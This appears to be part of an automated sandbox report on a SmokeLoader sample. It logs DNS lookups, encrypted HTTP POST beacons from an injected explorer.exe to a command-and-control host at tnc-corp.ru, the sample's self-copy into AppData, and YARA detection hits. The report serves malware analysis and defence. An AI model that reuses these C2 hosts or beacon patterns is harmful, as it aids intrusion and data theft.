                                                      Oct 24, 2024 18:39:04.717899084 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.717907906 CEST1.1.1.1192.168.2.40xaea2Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:04.793390036 CEST1.1.1.1192.168.2.40x1c4eName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105513096 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105526924 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105535030 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:11.105869055 CEST1.1.1.1192.168.2.40xed8aServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:18.460525036 CEST1.1.1.1192.168.2.40x2e23Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:20.873910904 CEST1.1.1.1192.168.2.40xda34Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112010002 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112081051 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112111092 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:27.112143040 CEST1.1.1.1192.168.2.40x236Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:38.116784096 CEST1.1.1.1192.168.2.40x256bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:40.602171898 CEST1.1.1.1192.168.2.40x6b8eName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820019007 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820038080 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820044041 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:46.820339918 CEST1.1.1.1192.168.2.40xd3a0Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078646898 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078690052 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078747988 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.078775883 CEST1.1.1.1192.168.2.40xe9dcServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:39:58.111707926 CEST1.1.1.1192.168.2.40xf7faName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223443985 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223489046 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223519087 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:04.223643064 CEST1.1.1.1192.168.2.40x5143Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609256029 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609308958 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.124.145.196A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.46.236.4A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.101.193.110A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru187.204.82.117A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.164.127.217A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru123.213.233.131A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru201.233.78.169A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru220.125.3.190A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru186.137.126.27A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:11.609339952 CEST1.1.1.1192.168.2.40xaf62No error (0)tnc-corp.ru189.61.54.32A (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.584759951 CEST1.1.1.1192.168.2.40xed1fServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.584814072 CEST1.1.1.1192.168.2.40xed1fServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.584844112 CEST1.1.1.1192.168.2.40xed1fServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.584871054 CEST1.1.1.1192.168.2.40xed1fServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:18.607841015 CEST1.1.1.1192.168.2.40x647dName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.690511942 CEST1.1.1.1192.168.2.40x4f05Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.690557003 CEST1.1.1.1192.168.2.40x4f05Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.690587997 CEST1.1.1.1192.168.2.40x4f05Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:22.690624952 CEST1.1.1.1192.168.2.40x4f05Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.543411016 CEST1.1.1.1192.168.2.40xa3Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.543457985 CEST1.1.1.1192.168.2.40xa3Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.543488026 CEST1.1.1.1192.168.2.40xa3Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.543524027 CEST1.1.1.1192.168.2.40xa3Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:33.558007956 CEST1.1.1.1192.168.2.40xa1c4Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:39.825125933 CEST1.1.1.1192.168.2.40x6fb9Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:39.825176001 CEST1.1.1.1192.168.2.40x6fb9Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:39.825206041 CEST1.1.1.1192.168.2.40x6fb9Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:39.825730085 CEST1.1.1.1192.168.2.40x6fb9Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.966073036 CEST1.1.1.1192.168.2.40x5737Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.966123104 CEST1.1.1.1192.168.2.40x5737Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.966160059 CEST1.1.1.1192.168.2.40x5737Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.966187954 CEST1.1.1.1192.168.2.40x5737Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:51.989211082 CEST1.1.1.1192.168.2.40xc66dName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:58.242844105 CEST1.1.1.1192.168.2.40x1c4bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:58.242886066 CEST1.1.1.1192.168.2.40x1c4bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:58.242913961 CEST1.1.1.1192.168.2.40x1c4bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:40:58.243598938 CEST1.1.1.1192.168.2.40x1c4bServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.679297924 CEST1.1.1.1192.168.2.40x61e5Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.679366112 CEST1.1.1.1192.168.2.40x61e5Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.679379940 CEST1.1.1.1192.168.2.40x61e5Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.679398060 CEST1.1.1.1192.168.2.40x61e5Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:09.694380999 CEST1.1.1.1192.168.2.40x8f3bName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:16.406060934 CEST1.1.1.1192.168.2.40x6b31Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:16.406099081 CEST1.1.1.1192.168.2.40x6b31Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:16.406109095 CEST1.1.1.1192.168.2.40x6b31Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 18:41:16.406213045 CEST1.1.1.1192.168.2.40x6b31Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • tkmyedfqjdrh.net
                                                        • tnc-corp.ru
                                                      • kvrakpmwnkdw.net
                                                      • krorrwetybapxgs.org
                                                      • nhvxjbuepegldhgi.net
                                                      • fhnrrbktckg.org
                                                      • gucrgvicowjmruy.com
                                                      • gdvvxgrxcdrf.net
                                                      • iiqfsjirxhqu.com
                                                      • lqjnthfwecsdh.net

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449736189.164.127.217802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:37:38.814829111 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://tkmyedfqjdrh.net/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 344
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:37:38.814851046 CEST344OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 40 e9 86
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuB@:Nzob7d*uK00B5\'&ABW+oGb&g^i=`?w2` jItUod"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.450003189.164.127.217802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:38:57.708359957 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://kvrakpmwnkdw.net/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 128
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:38:57.708403111 CEST128OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 0b e4 ec
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vut]/_mpUf`kNg<wp8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.450004189.164.127.217802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:39:11.298638105 CEST284OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://krorrwetybapxgs.org/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 362
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:39:11.298665047 CEST362OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 46 cd 8d
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuZFbdasCUNF-3|9}8@EDJBLlmF-Pam<HJY],@_vW7!i&a[1h|gX[7


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.453258189.164.127.217802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:39:31.057832003 CEST285OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://nhvxjbuepegldhgi.net/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 129
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:39:31.057862043 CEST129OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 51 18 c7 ff
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuQ9o{`Y1jL6Wcg)Pc


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.458682189.164.127.217802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:39:50.976933956 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://fhnrrbktckg.org/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 187
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:39:50.976965904 CEST187OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 43 bf ea
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu+C^Rubx4HFwii]X'23JVC5D*u%@<>|,3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.458683201.124.145.196802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:40:11.621645927 CEST284OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://gucrgvicowjmruy.com/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 228
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:40:11.621646881 CEST228OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 0a ed e6
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu[L2b1PI<zpN`~,bH(Mcy-!utD!)p`W"oAwqC'R2*'%kv)"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.458684201.124.145.196802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:40:26.494584084 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://gdvvxgrxcdrf.net/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 119
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:40:26.494601011 CEST119OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 07 ad 93
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu]&QVMK!R0LL


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.458685201.124.145.196802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:40:44.713968992 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://iiqfsjirxhqu.com/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 365
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:40:44.714004040 CEST365OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 25 e9 99
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vuS%rL$;h>Ej puR0jR2=TT"Ea]_$7opE/K~_P^*OtIVgNHOez,?O^r


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.458686201.124.145.196802580C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 24, 2024 18:41:02.565610886 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://lqjnthfwecsdh.net/
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 295
                                                      Host: tnc-corp.ru
                                                      Oct 24, 2024 18:41:02.565638065 CEST295OUTData Raw: 3b 6e 24 12 f7 bc 1b 52 a9 d9 c0 77 0f 01 7a b9 7d 0f b9 e7 1f 74 90 15 0b 7e 7b e1 41 c5 c6 1d 98 2a ce 2a 02 19 52 11 ee ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 5f cb 9e
                                                      Data Ascii: ;n$Rwz}t~{A**R? 9Yt M@NA .[k,vu._[0`Nj7/*vtBxL>n4[c:5:1zZPGKcujn0[!(Q[tvbc=?nuR(W-


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:12:37:10
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\Desktop\kGSZ4dCqYh.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\kGSZ4dCqYh.exe"
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:12:37:16
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff72b770000
                                                      File size:5'141'208 bytes
                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:5
                                                      Start time:12:37:35
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
